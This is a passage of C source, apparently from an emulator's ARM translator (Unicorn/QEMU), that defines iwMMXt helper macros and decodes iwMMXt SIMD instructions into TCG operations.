+    tcg_gen_ld_i32(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.cregs[reg]));
+    return var;
+}
+
+/* Write "var" to iwMMXt control register "reg".  var is consumed
+ * (freed) here.
+ */
+static inline void iwmmxt_store_creg(DisasContext *s, int reg, TCGv_i32 var)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    tcg_gen_st_i32(tcg_ctx, var, tcg_ctx->cpu_env, offsetof(CPUARMState, iwmmxt.cregs[reg]));
+    tcg_temp_free_i32(tcg_ctx, var);
+}
+
+/* cpu_M0 holds the current iwMMXt working value; spill it to wRn... */
+static inline void gen_op_iwmmxt_movq_wRn_M0(DisasContext *s, int rn)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    iwmmxt_store_reg(s, tcg_ctx->cpu_M0, rn);
+}
+
+/* ...or fill it from wRn. */
+static inline void gen_op_iwmmxt_movq_M0_wRn(DisasContext *s, int rn)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    iwmmxt_load_reg(s, tcg_ctx->cpu_M0, rn);
+}
+
+/* M0 |= wRn (cpu_V1 used as scratch for the loaded register). */
+static inline void gen_op_iwmmxt_orq_M0_wRn(DisasContext *s, int rn)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rn);
+    tcg_gen_or_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1);
+}
+
+/* M0 &= wRn. */
+static inline void gen_op_iwmmxt_andq_M0_wRn(DisasContext *s, int rn)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rn);
+    tcg_gen_and_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1);
+}
+
+/* M0 ^= wRn. */
+static inline void gen_op_iwmmxt_xorq_M0_wRn(DisasContext *s, int rn)
+{
+    TCGContext *tcg_ctx = s->uc->tcg_ctx;
+    iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rn);
+    tcg_gen_xor_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1);
+}
+
+/* Emit "M0 = helper_iwmmxt_<name>(M0, wRn)" for a two-operand op whose
+ * helper does not need cpu_env (cpu_V1 is scratch for the loaded wRn).
+ */
+#define IWMMXT_OP(name) \
+static inline void gen_op_iwmmxt_##name##_M0_wRn(DisasContext *s, int rn) \
+{ \
+    TCGContext *tcg_ctx = s->uc->tcg_ctx; \
+    iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rn); \
+    gen_helper_iwmmxt_##name(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); \
+}
+
+/* Same shape, but the helper additionally takes cpu_env (it reads or
+ * writes CPU state beyond M0 — presumably flag/saturation registers;
+ * see the iwmmxt helpers for specifics).
+ */
+#define IWMMXT_OP_ENV(name) \
+static inline void gen_op_iwmmxt_##name##_M0_wRn(DisasContext *s, int rn) \
+{ \
+    TCGContext *tcg_ctx = s->uc->tcg_ctx; \
+    iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rn); \
+    gen_helper_iwmmxt_##name(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1); \
+}
+
+/* Instantiate the byte/word/long (b/w/l) element-size variants at once. */
+#define IWMMXT_OP_ENV_SIZE(name) \
+IWMMXT_OP_ENV(name##b) \
+IWMMXT_OP_ENV(name##w) \
+IWMMXT_OP_ENV(name##l)
+
+/* One-operand env op: M0 = helper(env, M0). */
+#define IWMMXT_OP_ENV1(name) \
+static inline void gen_op_iwmmxt_##name##_M0(DisasContext *s) \
+{ \
+    TCGContext *tcg_ctx = s->uc->tcg_ctx; \
+    gen_helper_iwmmxt_##name(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0); \
+}
+
+/* Multiply/accumulate and sum-of-absolute-difference family. */
+IWMMXT_OP(maddsq)
+IWMMXT_OP(madduq)
+IWMMXT_OP(sadb)
+IWMMXT_OP(sadw)
+IWMMXT_OP(mulslw)
+IWMMXT_OP(mulshw)
+IWMMXT_OP(mululw)
+IWMMXT_OP(muluhw)
+IWMMXT_OP(macsw)
+IWMMXT_OP(macuw)
+
+/* Two-register unpack (interleave) ops, all element sizes. */
+IWMMXT_OP_ENV_SIZE(unpackl)
+IWMMXT_OP_ENV_SIZE(unpackh)
+
+/* Single-register unpack with zero (u) or sign (s) extension. */
+IWMMXT_OP_ENV1(unpacklub)
+IWMMXT_OP_ENV1(unpackluw)
+IWMMXT_OP_ENV1(unpacklul)
+IWMMXT_OP_ENV1(unpackhub)
+IWMMXT_OP_ENV1(unpackhuw)
+IWMMXT_OP_ENV1(unpackhul)
+IWMMXT_OP_ENV1(unpacklsb)
+IWMMXT_OP_ENV1(unpacklsw)
+IWMMXT_OP_ENV1(unpacklsl)
+IWMMXT_OP_ENV1(unpackhsb)
+IWMMXT_OP_ENV1(unpackhsw)
+IWMMXT_OP_ENV1(unpackhsl)
+
+/* Element-wise compares. */
+IWMMXT_OP_ENV_SIZE(cmpeq)
+IWMMXT_OP_ENV_SIZE(cmpgtu)
+IWMMXT_OP_ENV_SIZE(cmpgts)
+
+/* Element-wise min/max, signed and unsigned. */
+IWMMXT_OP_ENV_SIZE(mins)
+IWMMXT_OP_ENV_SIZE(minu)
+IWMMXT_OP_ENV_SIZE(maxs)
+IWMMXT_OP_ENV_SIZE(maxu)
+
+/* Element-wise add/sub in the n/u/s variants. */
+IWMMXT_OP_ENV_SIZE(subn)
+IWMMXT_OP_ENV_SIZE(addn)
+IWMMXT_OP_ENV_SIZE(subu)
+IWMMXT_OP_ENV_SIZE(addu)
+IWMMXT_OP_ENV_SIZE(subs)
+IWMMXT_OP_ENV_SIZE(adds)
+
+/* Averaging ops (byte/word, two rounding variants 0/1). */
+IWMMXT_OP_ENV(avgb0)
+IWMMXT_OP_ENV(avgb1)
+IWMMXT_OP_ENV(avgw0)
+IWMMXT_OP_ENV(avgw1)
+
+IWMMXT_OP_ENV(packuw)
IWMMXT_OP_ENV(packul)
IWMMXT_OP_ENV(packuq)
IWMMXT_OP_ENV(packsw)
IWMMXT_OP_ENV(packsl)
IWMMXT_OP_ENV(packsq)

/* Set the MUP bit (bit 1) of wCon, recording that an iwMMXt data
   register has been updated. */
static void gen_op_iwmmxt_set_mup(DisasContext *s)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tmp;
    tmp = load_cpu_field(s->uc, iwmmxt.cregs[ARM_IWMMXT_wCon]);
    tcg_gen_ori_i32(tcg_ctx, tmp, tmp, 2);
    store_cpu_field(tcg_ctx, tmp, iwmmxt.cregs[ARM_IWMMXT_wCon]);
}

/* Set the CUP bit (bit 0) of wCon, recording that an iwMMXt control
   register has been updated. */
static void gen_op_iwmmxt_set_cup(DisasContext *s)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tmp;
    tmp = load_cpu_field(s->uc, iwmmxt.cregs[ARM_IWMMXT_wCon]);
    tcg_gen_ori_i32(tcg_ctx, tmp, tmp, 1);
    store_cpu_field(tcg_ctx, tmp, iwmmxt.cregs[ARM_IWMMXT_wCon]);
}

/* Recompute the SIMD N/Z flags in wCASF from the current value of M0. */
static void gen_op_iwmmxt_setpsr_nz(DisasContext *s)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx);
    gen_helper_iwmmxt_setpsr_nz(tcg_ctx, tmp, tcg_ctx->cpu_M0);
    store_cpu_field(tcg_ctx, tmp, iwmmxt.cregs[ARM_IWMMXT_wCASF]);
}

/* M0 += zero-extended low 32 bits of wRn (used by WSAD accumulate). */
static inline void gen_op_iwmmxt_addl_M0_wRn(DisasContext *s, int rn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rn);
    tcg_gen_ext32u_i64(tcg_ctx, tcg_ctx->cpu_V1, tcg_ctx->cpu_V1);
    tcg_gen_add_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1);
}

/* Decode the addressing mode of an iwMMXt load/store and leave the
   effective address in 'dest'.  Handles pre/post-indexed forms and the
   optional base-register writeback.  Returns nonzero for an undefined
   encoding (neither indexed nor offset addressing). */
static inline int gen_iwmmxt_address(DisasContext *s, uint32_t insn,
                                     TCGv_i32 dest)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int rd;
    uint32_t offset;
    TCGv_i32 tmp;

    rd = (insn >> 16) & 0xf;
    tmp = load_reg(s, rd);

    /* 8-bit immediate, scaled by 4 when insn bit 8 is set. */
    offset = (insn & 0xff) << ((insn >> 7) & 2);
    if (insn & (1 << 24)) {
        /* Pre indexed */
        if (insn & (1 << 23))
            tcg_gen_addi_i32(tcg_ctx, tmp, tmp, offset);
        else
            tcg_gen_addi_i32(tcg_ctx, tmp, tmp, 0-offset);
        tcg_gen_mov_i32(tcg_ctx, dest, tmp);
        if (insn & (1 << 21))
            store_reg(s, rd, tmp);
        else
            tcg_temp_free_i32(tcg_ctx, tmp);
    } else if (insn & (1 << 21)) {
        /* Post indexed */
        tcg_gen_mov_i32(tcg_ctx, dest, tmp);
        if (insn & (1 << 23))
            tcg_gen_addi_i32(tcg_ctx, tmp, tmp, offset);
        else
            tcg_gen_addi_i32(tcg_ctx, tmp, tmp, 0-offset);
        store_reg(s, rd, tmp);
    } else if (!(insn & (1 << 23)))
        return 1;
    return 0;
}

/* Fetch the shift amount for an iwMMXt shift insn, ANDed with 'mask',
   into 'dest'.  With insn bit 8 set the amount comes from a wCGRn
   control register (only wCGR0..wCGR3 are legal); otherwise from the
   low 32 bits of data register wRd.  Returns nonzero on an undefined
   encoding. */
static inline int gen_iwmmxt_shift(DisasContext *s, uint32_t insn, uint32_t mask, TCGv_i32 dest)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int rd = (insn >> 0) & 0xf;
    TCGv_i32 tmp;

    if (insn & (1 << 8)) {
        if (rd < ARM_IWMMXT_wCGR0 || rd > ARM_IWMMXT_wCGR3) {
            return 1;
        } else {
            tmp = iwmmxt_load_creg(s, rd);
        }
    } else {
        tmp = tcg_temp_new_i32(tcg_ctx);
        iwmmxt_load_reg(s, tcg_ctx->cpu_V0, rd);
        tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_V0);
    }
    tcg_gen_andi_i32(tcg_ctx, tmp, tmp, mask);
    tcg_gen_mov_i32(tcg_ctx, dest, tmp);
    tcg_temp_free_i32(tcg_ctx, tmp);
    return 0;
}

/* Disassemble an iwMMXt instruction.  Returns nonzero if an error occurred
   (i.e. an undefined instruction).
   Layout: register-transfer and load/store forms are decoded first, then
   data-processing forms are dispatched on bits [23:20] and [11:4]. */
static int disas_iwmmxt_insn(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int rd, wrd;
    int rdhi, rdlo, rd0, rd1, i;
    TCGv_i32 addr;
    TCGv_i32 tmp, tmp2, tmp3;

    if ((insn & 0x0e000e00) == 0x0c000000) {
        if ((insn & 0x0fe00ff0) == 0x0c400000) {
            /* 64-bit transfers between a wRn and an ARM register pair. */
            wrd = insn & 0xf;
            rdlo = (insn >> 12) & 0xf;
            rdhi = (insn >> 16) & 0xf;
            if (insn & ARM_CP_RW_BIT) {			/* TMRRC */
                iwmmxt_load_reg(s, tcg_ctx->cpu_V0, wrd);
                tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_V0);
                tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 32);
                tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdhi], tcg_ctx->cpu_V0);
            } else {					/* TMCRR */
                tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_R[rdhi]);
                iwmmxt_store_reg(s, tcg_ctx->cpu_V0, wrd);
                gen_op_iwmmxt_set_mup(s);
            }
            return 0;
        }

        /* Load/store forms (WLDR*/WSTR*). */
        wrd = (insn >> 12) & 0xf;
        addr = tcg_temp_new_i32(tcg_ctx);
        if (gen_iwmmxt_address(s, insn, addr)) {
            tcg_temp_free_i32(tcg_ctx, addr);
            return 1;
        }
        if (insn & ARM_CP_RW_BIT) {
            if ((insn >> 28) == 0xf) {			/* WLDRW wCx */
                tmp = tcg_temp_new_i32(tcg_ctx);
                gen_aa32_ld32u(s, tmp, addr, get_mem_index(s));
                iwmmxt_store_creg(s, wrd, tmp);
            } else {
                /* i nonzero means M0 still needs widening from tmp. */
                i = 1;
                if (insn & (1 << 8)) {
                    if (insn & (1 << 22)) {		/* WLDRD */
                        gen_aa32_ld64(s, tcg_ctx->cpu_M0, addr, get_mem_index(s));
                        i = 0;
                    } else {				/* WLDRW wRd */
                        tmp = tcg_temp_new_i32(tcg_ctx);
                        gen_aa32_ld32u(s, tmp, addr, get_mem_index(s));
                    }
                } else {
                    tmp = tcg_temp_new_i32(tcg_ctx);
                    if (insn & (1 << 22)) {		/* WLDRH */
                        gen_aa32_ld16u(s, tmp, addr, get_mem_index(s));
                    } else {				/* WLDRB */
                        gen_aa32_ld8u(s, tmp, addr, get_mem_index(s));
                    }
                }
                if (i) {
                    tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_M0, tmp);
                    tcg_temp_free_i32(tcg_ctx, tmp);
                }
                gen_op_iwmmxt_movq_wRn_M0(s, wrd);
            }
        } else {
            if ((insn >> 28) == 0xf) {			/* WSTRW wCx */
                tmp = iwmmxt_load_creg(s, wrd);
                gen_aa32_st32(s, tmp, addr, get_mem_index(s));
            } else {
                gen_op_iwmmxt_movq_M0_wRn(s, wrd);
                tmp = tcg_temp_new_i32(tcg_ctx);
                if (insn & (1 << 8)) {
                    if (insn & (1 << 22)) {		/* WSTRD */
                        gen_aa32_st64(s, tcg_ctx->cpu_M0, addr, get_mem_index(s));
                    } else {				/* WSTRW wRd */
                        tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0);
                        gen_aa32_st32(s, tmp, addr, get_mem_index(s));
                    }
                } else {
                    if (insn & (1 << 22)) {		/* WSTRH */
                        tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0);
                        gen_aa32_st16(s, tmp, addr, get_mem_index(s));
                    } else {				/* WSTRB */
                        tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0);
                        gen_aa32_st8(s, tmp, addr, get_mem_index(s));
                    }
                }
            }
            tcg_temp_free_i32(tcg_ctx, tmp);
        }
        tcg_temp_free_i32(tcg_ctx, addr);
        return 0;
    }

    if ((insn & 0x0f000000) != 0x0e000000)
        return 1;

    /* Data-processing: key = insn[23:20] << 8 | insn[11:4]. */
    switch (((insn >> 12) & 0xf00) | ((insn >> 4) & 0xff)) {
    case 0x000:						/* WOR */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 0) & 0xf;
        rd1 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        gen_op_iwmmxt_orq_M0_wRn(s, rd1);
        gen_op_iwmmxt_setpsr_nz(s);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x011:						/* TMCR */
        if (insn & 0xf)
            return 1;
        rd = (insn >> 12) & 0xf;
        wrd = (insn >> 16) & 0xf;
        switch (wrd) {
        case ARM_IWMMXT_wCID:
        case ARM_IWMMXT_wCASF:
            /* Writes to wCID/wCASF are ignored. */
            break;
        case ARM_IWMMXT_wCon:
            gen_op_iwmmxt_set_cup(s);
            /* Fall through.  wCon/wCSSF writes clear the bits set in Rd. */
        case ARM_IWMMXT_wCSSF:
            tmp = iwmmxt_load_creg(s, wrd);
            tmp2 = load_reg(s, rd);
            tcg_gen_andc_i32(tcg_ctx, tmp, tmp, tmp2);
            tcg_temp_free_i32(tcg_ctx, tmp2);
            iwmmxt_store_creg(s, wrd, tmp);
            break;
        case ARM_IWMMXT_wCGR0:
        case ARM_IWMMXT_wCGR1:
        case ARM_IWMMXT_wCGR2:
        case ARM_IWMMXT_wCGR3:
            gen_op_iwmmxt_set_cup(s);
            tmp = load_reg(s, rd);
            iwmmxt_store_creg(s, wrd, tmp);
            break;
        default:
            return 1;
        }
        break;
    case 0x100:						/* WXOR */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 0) & 0xf;
        rd1 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        gen_op_iwmmxt_xorq_M0_wRn(s, rd1);
        gen_op_iwmmxt_setpsr_nz(s);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x111:						/* TMRC */
        if (insn & 0xf)
            return 1;
        rd = (insn >> 12) & 0xf;
        wrd = (insn >> 16) & 0xf;
        tmp = iwmmxt_load_creg(s, wrd);
        store_reg(s, rd, tmp);
        break;
    case 0x300:						/* WANDN */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 0) & 0xf;
        rd1 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        /* NOTE(review): arithmetic negation (two's complement), not a
           bitwise NOT, before the AND.  This matches upstream QEMU but
           looks suspicious for an AND-NOT operation — verify against the
           iwMMXt spec before changing. */
        tcg_gen_neg_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0);
        gen_op_iwmmxt_andq_M0_wRn(s, rd1);
        gen_op_iwmmxt_setpsr_nz(s);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x200:						/* WAND */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 0) & 0xf;
        rd1 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        gen_op_iwmmxt_andq_M0_wRn(s, rd1);
        gen_op_iwmmxt_setpsr_nz(s);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x810: case 0xa10:				/* WMADD */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 0) & 0xf;
        rd1 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        if (insn & (1 << 21))
            gen_op_iwmmxt_maddsq_M0_wRn(s, rd1);
        else
            gen_op_iwmmxt_madduq_M0_wRn(s, rd1);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        break;
    case 0x10e: case 0x50e: case 0x90e: case 0xd0e:	/* WUNPCKIL */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        switch ((insn >> 22) & 3) {
        case 0:
            gen_op_iwmmxt_unpacklb_M0_wRn(s, rd1);
            break;
        case 1:
            gen_op_iwmmxt_unpacklw_M0_wRn(s, rd1);
            break;
        case 2:
            gen_op_iwmmxt_unpackll_M0_wRn(s, rd1);
            break;
        case 3:
            return 1;
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x10c: case 0x50c: case 0x90c: case 0xd0c:	/* WUNPCKIH */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        switch ((insn >> 22) & 3) {
        case 0:
            gen_op_iwmmxt_unpackhb_M0_wRn(s, rd1);
            break;
        case 1:
            gen_op_iwmmxt_unpackhw_M0_wRn(s, rd1);
            break;
        case 2:
            gen_op_iwmmxt_unpackhl_M0_wRn(s, rd1);
            break;
        case 3:
            return 1;
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x012: case 0x112: case 0x412: case 0x512:	/* WSAD */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        if (insn & (1 << 22))
            gen_op_iwmmxt_sadw_M0_wRn(s, rd1);
        else
            gen_op_iwmmxt_sadb_M0_wRn(s, rd1);
        /* Bit 20 clear selects the accumulating (WSADZ-less) form. */
        if (!(insn & (1 << 20)))
            gen_op_iwmmxt_addl_M0_wRn(s, wrd);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        break;
    case 0x010: case 0x110: case 0x210: case 0x310:	/* WMUL */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        if (insn & (1 << 21)) {
            if (insn & (1 << 20))
                gen_op_iwmmxt_mulshw_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_mulslw_M0_wRn(s, rd1);
        } else {
            if (insn & (1 << 20))
                gen_op_iwmmxt_muluhw_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_mululw_M0_wRn(s, rd1);
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        break;
    case 0x410: case 0x510: case 0x610: case 0x710:	/* WMAC */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        if (insn & (1 << 21))
            gen_op_iwmmxt_macsw_M0_wRn(s, rd1);
        else
            gen_op_iwmmxt_macuw_M0_wRn(s, rd1);
        if (!(insn & (1 << 20))) {
            /* Accumulating form: add the previous contents of wRd. */
            iwmmxt_load_reg(s, tcg_ctx->cpu_V1, wrd);
            tcg_gen_add_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1);
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        break;
    case 0x006: case 0x406: case 0x806: case 0xc06:	/* WCMPEQ */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        switch ((insn >> 22) & 3) {
        case 0:
            gen_op_iwmmxt_cmpeqb_M0_wRn(s, rd1);
            break;
        case 1:
            gen_op_iwmmxt_cmpeqw_M0_wRn(s, rd1);
            break;
        case 2:
            gen_op_iwmmxt_cmpeql_M0_wRn(s, rd1);
            break;
        case 3:
            return 1;
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x800: case 0x900: case 0xc00: case 0xd00:	/* WAVG2 */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        if (insn & (1 << 22)) {
            if (insn & (1 << 20))
                gen_op_iwmmxt_avgw1_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_avgw0_M0_wRn(s, rd1);
        } else {
            if (insn & (1 << 20))
                gen_op_iwmmxt_avgb1_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_avgb0_M0_wRn(s, rd1);
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x802: case 0x902: case 0xa02: case 0xb02:	/* WALIGNR */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        /* Alignment amount comes from the selected wCGRn register. */
        tmp = iwmmxt_load_creg(s, ARM_IWMMXT_wCGR0 + ((insn >> 20) & 3));
        tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 7);
        iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rd1);
        gen_helper_iwmmxt_align(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1, tmp);
        tcg_temp_free_i32(tcg_ctx, tmp);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        break;
    case 0x601: case 0x605: case 0x609: case 0x60d:	/* TINSR */
        if (((insn >> 6) & 3) == 3)
            return 1;
        rd = (insn >> 12) & 0xf;
        wrd = (insn >> 16) & 0xf;
        tmp = load_reg(s, rd);
        gen_op_iwmmxt_movq_M0_wRn(s, wrd);
        /* tmp2 = lane mask, tmp3 = lane shift. */
        switch ((insn >> 6) & 3) {
        case 0:
            tmp2 = tcg_const_i32(tcg_ctx, 0xff);
            tmp3 = tcg_const_i32(tcg_ctx, (insn & 7) << 3);
            break;
        case 1:
            tmp2 = tcg_const_i32(tcg_ctx, 0xffff);
            tmp3 = tcg_const_i32(tcg_ctx, (insn & 3) << 4);
            break;
        case 2:
            tmp2 = tcg_const_i32(tcg_ctx, 0xffffffff);
            tmp3 = tcg_const_i32(tcg_ctx, (insn & 1) << 5);
            break;
        default:
            /* Unreachable (size 3 rejected above); keeps compilers quiet. */
            TCGV_UNUSED_I32(tmp2);
            TCGV_UNUSED_I32(tmp3);
        }
        gen_helper_iwmmxt_insr(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2, tmp3);
        tcg_temp_free_i32(tcg_ctx, tmp3);
        tcg_temp_free_i32(tcg_ctx, tmp2);
        tcg_temp_free_i32(tcg_ctx, tmp);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        break;
    case 0x107: case 0x507: case 0x907: case 0xd07:	/* TEXTRM */
        rd = (insn >> 12) & 0xf;
        wrd = (insn >> 16) & 0xf;
        if (rd == 15 || ((insn >> 22) & 3) == 3)
            return 1;
        gen_op_iwmmxt_movq_M0_wRn(s, wrd);
        tmp = tcg_temp_new_i32(tcg_ctx);
        switch ((insn >> 22) & 3) {
        case 0:
            tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, (insn & 7) << 3);
            tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0);
            if (insn & 8) {
                tcg_gen_ext8s_i32(tcg_ctx, tmp, tmp);
            } else {
                tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xff);
            }
            break;
        case 1:
            tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, (insn & 3) << 4);
            tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0);
            if (insn & 8) {
                tcg_gen_ext16s_i32(tcg_ctx, tmp, tmp);
            } else {
                tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xffff);
            }
            break;
        case 2:
            tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, (insn & 1) << 5);
            tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tcg_ctx->cpu_M0);
            break;
        }
        store_reg(s, rd, tmp);
        break;
    case 0x117: case 0x517: case 0x917: case 0xd17:	/* TEXTRC */
        if ((insn & 0x000ff008) != 0x0003f000 || ((insn >> 22) & 3) == 3)
            return 1;
        tmp = iwmmxt_load_creg(s, ARM_IWMMXT_wCASF);
        switch ((insn >> 22) & 3) {
        case 0:
            tcg_gen_shri_i32(tcg_ctx, tmp, tmp, ((insn & 7) << 2) + 0);
            break;
        case 1:
            tcg_gen_shri_i32(tcg_ctx, tmp, tmp, ((insn & 3) << 3) + 4);
            break;
        case 2:
            tcg_gen_shri_i32(tcg_ctx, tmp, tmp, ((insn & 1) << 4) + 12);
            break;
        }
        /* Move the selected nibble's flags into the ARM NZCV position. */
        tcg_gen_shli_i32(tcg_ctx, tmp, tmp, 28);
        gen_set_nzcv(s, tmp);
        tcg_temp_free_i32(tcg_ctx, tmp);
        break;
    case 0x401: case 0x405: case 0x409: case 0x40d:	/* TBCST */
        if (((insn >> 6) & 3) == 3)
            return 1;
        rd = (insn >> 12) & 0xf;
        wrd = (insn >> 16) & 0xf;
        tmp = load_reg(s, rd);
        switch ((insn >> 6) & 3) {
        case 0:
            gen_helper_iwmmxt_bcstb(tcg_ctx, tcg_ctx->cpu_M0, tmp);
            break;
        case 1:
            gen_helper_iwmmxt_bcstw(tcg_ctx, tcg_ctx->cpu_M0, tmp);
            break;
        case 2:
            gen_helper_iwmmxt_bcstl(tcg_ctx, tcg_ctx->cpu_M0, tmp);
            break;
        }
